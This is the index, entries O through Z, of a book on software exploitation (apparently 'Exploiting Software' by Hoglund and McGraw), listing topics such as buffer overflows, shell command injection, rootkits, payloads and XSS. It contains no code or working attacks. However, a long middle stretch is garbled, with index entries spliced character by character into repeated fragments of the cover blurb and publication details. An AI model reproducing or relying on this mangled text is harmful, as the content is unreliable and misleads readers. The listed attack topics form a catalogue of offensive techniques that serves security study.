Open dynamical systems
open function in shell command injection
Open shortest path first (OSPF), buffer overflow in
Open-ended systems
Open-systems view
  damage potential in
  exposure and potency in
  risk in
OpenDataSource function
OpenThread function
Operating systems
  encapsulation of
  extensibility of
  future of
  integration of
Oracle 9i
OS stack identification in attack patterns
OSPF (open shortest path first), buffer overflow in
Osprey aircraft, software failures in
Out instructions
Out registers in SPARC
Outlook application, injection with
Outlook View Control, injection with
Output events in attack patterns
Output points in partition analysis
Outside-in breakpoints
Outsourced software
  backdoors in
  future of
Overflow, buffer [See Buffer overflow]
Overwriting
  exception handler frames
  memory headers

P

PA-RISC payloads
  construction of
  inter-space branching on
  inter-space trampolines with
  location of
  stacks in
Packets
  desynchronization
  leaking data in
Parallel EEPROM
Parallel port interrupts
Parameters
  expansion of, buffer overflow from
  in shell command injection
Parser code, reversing [See Crafted input; Reversing parser code]
Parsing
  buffer overflows from
  commands, delimiters for
Partition analysis
passwd command
Password limitations
Patches
  binary code
  NT kernel
  peephole patches
  finding in reverse engineering
Patents
PATH environment variable
Patterns [See also Attack patterns]
Payloads
  activation of
  in buffer overflow
  checksum/hash loading for
  dynamic jump tables for
  hard-coded function calls for
  size of
  XOR protection for
  in injection vectors
  memory locations for
  on RISC architectures
    branch delays with
    in AIX/PowerPC
    in PA-RISC
    in SPARC
    instruction locations in
    MIPS instructions
    on HPUX
PCL (printer control language) codes
PDAs, embedded systems in
Peephole patches
Perl
  embedding within ASP pages
  system calls in
  taint mode in
Permissions on directories
  with ACLs
Person-in-the-middle attacks
Phase space analysis
Phone phreaks
Phone systems
  blue boxes for
  in-band signals with
PHP
  command injection in
  global variables in
Phrack Magazine
Physical memory, writing to
Physical security
PICs (Programmable Interrupt Controllers)
PIDs (process identifications)
  for threads
  in GDB
Ping packets
PIT tool
Pointers and pointer operations
  buffer overflow from
  byte operations with
  in Prolog/Epilog code
  in reversing parser code
Poison pills
poll function
Polymorphism
Pop-up windows from injection
Port scans
Ports on controller chips
POST requests
Postfix NULL terminators
PostNuke content management system
Potency in open-systems view
Preloader, local filenames with
Primary IDE channel interrupt
Primary opcodes
Principle of least privilege
  limitations of
  white listing in
Printer control language (PCL) codes
Printers and printing
  data from memory
  in-band signals with
printf function
Privileged resources
  attacking
  in server software
  programs writing to
Privilege escalation
Process identifications (PIDs)
  for threads
  in GDB
Process injection for hiding programs
Process records, removing
Process-permissions equal trusts
Processes
  attaching to
  enumerating
  for reading from untrusted sources
  hiding
  in reverse engineering
  scheduling on server software
  spawning, handle inheritance in
Program execution flow, single stepping for
Program structure and logic, reverse engineering for
Programmable Interrupt Controllers (PICs)
Programs using drivers
Prolog/Epilog code
  canary values in
  nonexecutable stacks in
Promiscuous mode
Protocol clarity in packet defragmentation
PROTOS tool
PS/2 mouse interrupt
Purify tool


Q

Quality assurance (QA) testing
  limitations of
  overlooking
Query strings
  in file system attacks
  XSS in
QueryDirectoryFile function




R

Race conditions
  detecting
  in geographically distributed systems
Radar systems
  embedded systems in
  flash ROM in
Raw packet interfaces, Java support for
Reactive subscription services, IDSs as
Reactive technologies
read function
Reading
  EEPROM for enabling
  from untrusted sources
  hardware memory
  master boot record
  memory in reverse engineering
ReadProcessMemory function
ReadRegistry function
Real-time clock interrupt
Rebooting for removing observable effects
REC program
Recovery systems
Red pointing
Redirection
  directory
  executing
  server-side page references
  Trojan executables
  with CWD
Reference monitors
Reflection
  against trusted sites
  with in-band signals
Registering
  drivers
  unload routines
Registers
  examining
  for boron tags
  in buffer overflow
  in MIPS
  in SPARC
Registry keys
  as attack targets
  controllable
regmon tool
Regular expressions
Relative path injection
Relative path traversal
Release guards
Remote attacks
Remote procedure calls (RPCs)
Remote xterms with server software
Removing
  observable effects
  process records
Ren, Chris
Replies, injection with
report_out.txt file
require function
ResetPC function
Resource files, executable code in
Resource IDs
ret instruction
Return addresses
  for injection vectors
  in buffer overflow attacks
Reverse compilers [See Source code; Decompilers]
Reverse engineering
  audit access requirements in
  API resources for
  automatic bulk auditing in
  black box analysis for
  breakpoints for
  code coverage for
  cracking tools for
  debuggers for
  decompiling in
  development of
  disassembling in
  fault injection in
  graphing for
  gray box analysis for
  I-Planet Server
  IDA plugins for
  input tracing for
  kernel access in
  leaking buffer data in
  legality of
  multithreading programs
  patching in
  process snapshots in
  purpose of
  reading and writing memory in
  red pointing in
  single stepping in
  version differences for
  white box analysis for
RevertToSelf function
RISC architectures, payloads on [See Payloads]
Risk and risk assessment
  actual
  defined
  for vulnerabilities
  in open systems
ROM
Root access, need for
Rootkits
  advanced topics
  call hooking for
  detecting
  for hardware viruses [See Hardware viruses]
  for hiding files and directories
  for interrupts
  for low-level disk access
  hiding
  key logging
  network support for drivers
  patching binary code
  Trojan executable redirection
Routers
  black box analysis for
  buffer overflow in
RPCs (remote procedure calls)
run function
Running processes, attaching to
Runouts in code tracing
Runtime memory addresses, mapping
Runtime tracing


[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S ] [ T] [ U] [ V] [ W ] [ X] [ Z ] sam ple_callback f un ct ion Sat ellit es, exploit at ion of sav e in str uct ion SCADA soft ware weak nesses Scanco des scan f fu nct ion •

Table of Content s

Schedulin g pro cesses • I ndex2nd Scien t ific met hod reverse en gineering Expl oit ing Softwin a re How to Br e ak Code Script k iddies By Gr eg Hoglund , Gar y McGr aw Script ing. FileSystem Ob ject Script let . Ty peLib Pub Script s lish er: Addison Wesley Pub e: February buf ferDat o verf lows f rom 17, 200 4 cross-I SBN: site [ See 0- 20XSS 1- 786 (cro 95ss-sit -8 e script in g)] emb eddin g 51 2 Pages: in n onscr ip t elem ent s in script s 2nd misclassif icat ion with wit h client soft ware 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h 12t h scrr un. dll f ile 2nd 3rd 4t h 5t h

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Scrubb in g p roblem in Et hernet 2nd fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? SeAccessCh eck f unct ion 2nd 3rd What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Sea rch pat hs in conf igurat ion f iles seccinit . c f ile

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d seccook . c f ile t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om secf ail. c file at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Second serial port int errupt Secondary I DE el int erru This m ust - hchann ave book mpt ay Secret scr ipt v kariables id die

shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Secrets and Lies (Sch neier) Securing Java (McGraw an d Felt en ) 2nd 3rd Securit Why y

sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

boron t ags f or

When w or k for buf fer ovnet er flows

secur it y m ech anisms do n ot w or k

in n et wor k- based soft ware

t ack on IAt nt ernet

pat t er ns

soft ware vs. applicat io n

Rev er se engineer in g

th rough ob scurit y

Securit y Engineering (And erson)

Classic at t acks ag ainst serv er soft w ar e

Securit y error han dlers

Securit y f laws, reverse engineering for

Sur pr ising at t acks ag ainst clien t soft war e

Securit y t est ing Seg ment ed GET requ s Tech niqu esestf or

cr aft ing m aliciou s inpu t

Self -decry pt ing pay loads 2nd 3rd Self -or ganizing sy st ems The t echn ical

det ails of b uf fer ov er f low s

Sen dKeyboar dComm and f unction 2nd Sen dm ail, Root o verf k itlow s in Ser ial EEPROM 2nd

Ex ial p lo i t in S o ft a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Ser port intgerrupt sw 2nd soft w ar e.ro l of client soft ware 2nd Ser ver cont Ser ver sof twar e 2nd adding users aut hent icat ion in 2nd blin d t ru st in 2nd conf igure t ru st in 2nd 3rd 4t h 5t h en viro nm en t variables in 2nd 3rd 4t h err or co de check ing in ex plorin g f ile sy st em s 2nd 3rd 4t h 5t h 6t h

FTP in ject ion point s in 2nd in put pat h tr acing in 2nd 3rd 4t h 5t h 6t h per mission s in herit ance in phase space an alysis in 2nd 3rd 4t h privilege escalat ion problem in 2nd 3rd 4t h process spawning in

• •

rem ot e x t erms wit h

Table of Content s

schedulin g processes on 2nd

I ndex

session I Ds in Expl oit ing Softw a re How to Br e ak Code shell com ma nd in ject ion in [ See Shell com m and inject ion ] By Gr eg Hoglund , Gar y McGr aw TFTP tr ust ed in put pr oblem in 2nd 3rd wit h lish local Pub er:sockets Addison2nd Wesley Ser verreference Pubside Datpage e: February 17,redir 200ects 4 Ser vice out ages from wo rms I SBN: 0- 20 1- 786 95 -8 Ser viceName v alu e Pages: 51 2 Session aut hent icat ion Session I Ds cookies for in serv er soft ware Set Break point fu nct ion

How oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Set EI Pdf un ct ion fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Set LEDS f unction What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Set SingleSt ep fu nct ion set snap fu nct ion 2nd

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Set Sy st emI n form at ion fu nct ion tset echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om uid ut ilit y at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . sf c.dll file sf cfiles.d ll file

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Shared buf fers, leaking dat a in 2nd 3rd Shell code in em bedded sy st ems Shell com m and inject ion 2nd delim iters sof in 2nd 3rde Why t w ar

ex ploit w ill con t inue t o be a ser ious p r oblem

flut t ering windows fr om for binary buw ildor in gk 2nd 3rd it y Whenfile net secur

m ech anisms do n ot w or k

for t ext file bu ildin g th rough ar gum entt er s f rom At t ack pat ns ot h er progr ams Short - t erm fut u re of sof t ware 2nd 3rd 4t h 5t h

Rev er seI DSs engineer Signat ur e- based 2nd 3rdin g Signed/ u nsign ed m ismat ch es 2nd 3rd 4t h 5t h

ation, t acks Simple Classic script inj ect XSSag in ainst 2nd

serv er soft w ar e

Single st epping

Sur pr ising at t acks ag ainst clien t soft war e

in rev erse eng in eer in g 2nd in ru nt im e t racing 2nd

Tech niqu es f or cr aft ing m aliciou s inpu t

Single-st ep flag Size

The t echn ical det ails of b uf fer ov er f low s

buf fer 2nd

payload Root k it s Slashes (/ ) in alt erna te en coding 2nd 3rd 4t h 5t h Slid inlo g riegist ersSin SPARC Ex p t in g o ft w a re is slt i inw strar uct soft e.ion

f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak

2nd

Sm ar t obj ect s Smar tBit s t ool Smashing t he st ack Snapsh ot s, process 2nd 3rd 4t h 5t h 6t h Snif fers for I DSs for OS st ack ident if ication 2nd Social eng in eerin g in C5 at t acks

Sock et s, serv er soft ware with 2nd Soft I ce debugger Soft ware bad 2nd def ined essen t ial fut u re of 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h



vu lnerabilit ies

Table of Content s

Soft ware copy pro tect ion limit at ions



I ndex

Soft ware dist ribut ion, f ut u re of Expl oit ing Softw a re How to Br e ak Code Soft ware Fa ult I n ject ion (Voas and McGraw) 2nd By Grware eg Hoglund , Gar ym McGr Soft licen sing, ASP odelaw of Soft ware securit y v s. applicat ion secur ity Soft ware t est diff icult ies in Pub lish er:in g, Addison Wesley Solaris Pubsyst Datem e: sFebruary 17, 200 4 buf fer o verf low in I SBN: 0- 20 1- 786 95 -8 tar get mod els for 2nd Pages: 51 2 Soun d car d int erru pt Source code deco mpilers for in wh ite box an alysis 2nd vs. ex ecut able

How d oes SOURCES f ile sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? SourceScope tooru l 2nd What t ools beattuack sed for buf fer ovcan er flow s t o b reak soft war e? Th is book p rov ides t he answ er s. for whit e box analysis

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Space ch aract ers in equ ivalent request s tSPARC echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om sy st ems at t fun ackct,ion y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . call n est in g in payload con st ruct ion in 2nd 3rd 4t h

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he reg ister windows in scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t sta cks on 2nd

Special ch aract ers in par sing Special-pur puteat ex ionploit al un it sw ill Whypose sofcom t w ar

con t inue t o be a ser ious p r oblem

Special-pur pose OSs Spike t When ool

net w or k secur it y m ech anisms do n ot w or k

Spoofin g SpoonFTP, t riple-do y in 2nd At t ack patt tvulnerabilit er ns Spreadsheet s, XSS in sprin tf Rev fun cter ionse

engineer in g

Spy in g 2nd 3rd

Classic at tbox acks agsis ainst serv er SQL Serv er 7 , gray analy for 2nd

soft w ar e

SQL st at em en t s, buf fer ov erf lows from 2nd

Sur pr ising at t acks ag ainst clien t soft war e

St ack t races for helpct r. ex e

St ack ed applicat ions, concept ual view of

Tech niqu es f or cr aft ing m aliciou s inpu t

St ackGu ard t ool 2nd 3rd 4t h 5t h 6t h 7t h St ack s an d st ack ov erf low 2nd

The t echn ical det ails of b uf fer ov er f low s

att ack pat t er ns 2nd

except ion khan Root it sdler f rames over writin g in fix ed -size bu ff ers in 2nd buifft er ww 2nd Ex in p lo in overf g S oloft a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak in C+ + 2nd 3rd soft w ar e. in ject ion vector s f or NULL term inat ion in 2nd 3rd 4t h 5t h 6t h 7t h on PA- RI SC 2nd 3rd on SPARC 2nd St ackSh ield t ool St atem ent set s, h ost ile St ates in bu ff er overf lo w 2nd

in open -ended sy st em s in so ft ware 2nd mappin g 2nd St atic ana lysis t ools f or buf fer overf low at t ack s [ See also SourceScope] St atic st rings in buf fer ov er flow St atist ical windows in anom aly-based I DSs St ealt h act iv ities St egan ograph y



Table of Content s



I ndex

st epi com m and

St orage f iles, h iding Expl oit ing Softw a re How to Br e ak Code St ored procedu res By Gr egferHoglund , Gar y McGr buf o verf lows f rom 2nd aw in Oracle 9i st rcatPub fulish nct ion er: Addison Wesley st rcpy fu nct Pub Dation e: February 17, 200 4 buf fer o verf low f rom 2nd 3rd 4t h I SBN: 0- 20 1- 786 95 -8 in rev erse eng in eer in g Pages: 51 2 St ress t est ing St ring fu nct ions in buf fer overf low at t ack s 2nd 3rd st rlen fu nct ion 2nd st rn cat f unction 2nd 3rd st rn cpy f unct ion 2nd

How d oes Subopco des sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Subscr ip tion int servru ices What t ools canmsbe u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Subv ersiv e progra classificat ion of

Ex def p loined i t in2nd g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d tSWI echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om FT n et work at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Switches, black box analy sis for Sym bolic Link s, ov erf lo w in


Synchronization of packets 2nd
syscall function
syslog function
System calls
  for reverse engineering
  hooking
  user-supplied variables passed to
System directories as attack targets
System file protection, disabling
system function
  buffer overflows from 2nd
  attacks in Prolog/Epilog
  in shell command injection
  Perl calls to 2nd
System timer interrupt
SystemLoadAndCallImage function
Systems
  privileges for 2nd
  software as


T

T-SQL (transact SQL) protocol 2nd
Tags
  boron [See Boron tags]
  overflow in
Taint mode in Perl 2nd
takesnap function 2nd 3rd
Tankers, embedded systems in
Target components in attack patterns 2nd
Target software
TARGETPATH environment variable
Taxonomy of attack patterns 2nd 3rd 4th
Taylor UUCP daemon
TCP/IP
  packet defragmentation in
  ports as entry points
Technology adoption rates
TELNET environment variables
Temporary files
TERM environment variable
term function
Terminals
  character injection in 2nd 3rd
  escape codes for 2nd 3rd
Testing methodologies, fault injection for 2nd 3rd
Text files, shell command injection for
TFTP (Tiny FTP)
The PIT tool
Thousand lines of code (KLOC) in bug rates 2nd 3rd
Threads, enumerating 2nd
Three-dimensional phase space plot of points
Time to market pressures
TimerDPC function
Timing attacks, detecting
Timing issues
  in EEPROM
  in geographically distributed systems
Tiny FTP (TFTP)
Titan application firewall
traceroute tool
Tracing code [See Code tracing]
Trade secrets
Tradecraft, digital 2nd 3rd
Trampoline attack 2nd 3rd 4th 5th
Transact SQL (T-SQL) protocol 2nd
Transaction-based systems
Transport-level security
TRAP FLAG
Traversal, file system 2nd
Trigger filters
Trillian chat client 2nd
Triple-dot vulnerability 2nd
Tripwire, redirection with 2nd
Trojan executable redirection
  drivers for 2nd 3rd 4th 5th 6th
  with Tripwire 2nd
Trunk lines, controlling 2nd
Truss tool 2nd
Trust issues
  design-level
  in buffer overflows
  in Java
  in server software 2nd 3rd 4th 5th 6th 7th 8th
  input-based
  with users
Trusted sites, reflection against
Turing machines


Two-stage buffer overflow attacks 2nd [See also Trampoline attack]
Type confusion attacks in Java
Type safe languages 2nd
TypeLib, attacks on


U

Undisclosed exploits
Unicode encoding in equivalent requests 2nd
Uniform Computer Information Transactions Act (UCITA)
Uniform resource identifier (URI) data, locating routines for 2nd
Uniform resource locators (URLs)
  equivalent requests 2nd 3rd
  passing local filenames in place of 2nd
  trust assumptions in
Universal Turing machines
UNIX environment variables
UNIX-to-UNIX copy program (UUCP)
Unloadable drivers 2nd
Unsafe languages
Unsigned/signed mismatches 2nd 3rd 4th 5th
Untrusted sources, reading from
URI (uniform resource identifier) data, locating routines for 2nd
URLs (uniform resource locators)
  in equivalent requests 2nd 3rd
  passing local filenames in place of 2nd
  trust assumptions in
US Vincennes software failures
User interfaces for server software
User-controlled filenames, XSS in
User-mode debuggers
User-supplied configuration files for elevated privilege
User-supplied variables, passed to file system calls
Users, adding
UTF-8 encoding
UUCP (UNIX-to-UNIX copy program)


V

Valgrind debugger
Variables
  in buffer overflow attacks 2nd 3rd 4th 5th
  in PHP 2nd 3rd
  in server software 2nd 3rd 4th
  user-supplied
Version differences for reverse engineering
Vessel Traffic Management Information System (VTMIS)
Virtual machines (VMs)
  buffer overflows in 2nd 3rd
  encapsulation of
  extensibility of
VirtualQueryEx function
  breakpoints for 2nd 3rd
  for memory querying 2nd
Virus checkers as reactive technology
Viruses
  development of
  hardware [See Hardware viruses]
  in client scripts 2nd
  poison pills for
Visibility of faults
Vitek, Ian 2nd
von Bertalanffy, Ludwig
Voyager spacecraft
vsprintf function
VT terminal escape codes
Vtables
VTMIS (Vessel Traffic Management Information System)
Vulnerabilities
  backtracing from 2nd 3rd
  collections of
  defined 2nd
  design-level 2nd
  increases in
  risk assessment for 2nd
VxWorks OS
  flash ROM in
  in embedded systems


W

WaitForKeyboard function 2nd
wcsncat function
  in helpctr.exe 2nd 3rd 4th
  in WINNT 2nd
WDASM disassembler
Weak local calls, finding 2nd 3rd 4th 5th
Web browsers and ActiveX 2nd
Web code and XML
Web logs
Web servers
  command-line parameters with
  ghost characters with
  misclassification of
Web spoofing
Webalizer program
WEP (wired equivalent privacy) encryption algorithm
White box analysis 2nd
  vs. black box analysis
White lists for input
  vs. black lists 2nd
White space in equivalent requests
Whitehat Security Arsenal (Rubin)
Whittaker, James
Winamp program
Windows operating systems
  disabling system file protection for
  heap headers in
  kernel patching in 2nd 3rd 4th 5th 6th 7th 8th 9th 10th 11th 12th
  key loggers in 2nd
  lines of code in
  message pumps in
  wcsncat function in 2nd
Wired equivalent privacy (WEP) encryption algorithm
Wireless systems
  future of 2nd
  hiding attacker identity in 2nd
Worms
  operation of 2nd
  service outages from
write_eeprom function
WriteProcessMemory function
Writing
  enabling, EEPROM for
  hardware memory 2nd 3rd 4th 5th 6th 7th 8th
  kernel rootkits
  master boot records
  memory in reverse engineering 2nd
  to memory, physical
  to privileged resources
Writing Secure Code (Howard and LeBlanc) 2nd 3rd
WSARecv function
  backtracing to
  in partition analysis
  in reverse engineering
WSASend function
Wscript.network, attacks on
WScript.Shell, attacks on
wsprintf function


X

x command 2nd
X Windows, back doors on
x86 debuggers 2nd 3rd
x86 feature set
XML markup language
XOR protection
XSS (cross-site scripting)
  in HTTP headers
  in HTTP query strings 2nd
  in Javascript alert dialog attacks
  in reflection against trusted sites
  in simple script injection 2nd
  in user-controlled filenames
  xterms with server software
Xt lib, buffer overflow in


Z

Zone transfers
ZwCreateProcess function
ZwCreateSection function 2nd
ZwOpenFile function 2nd 3rd
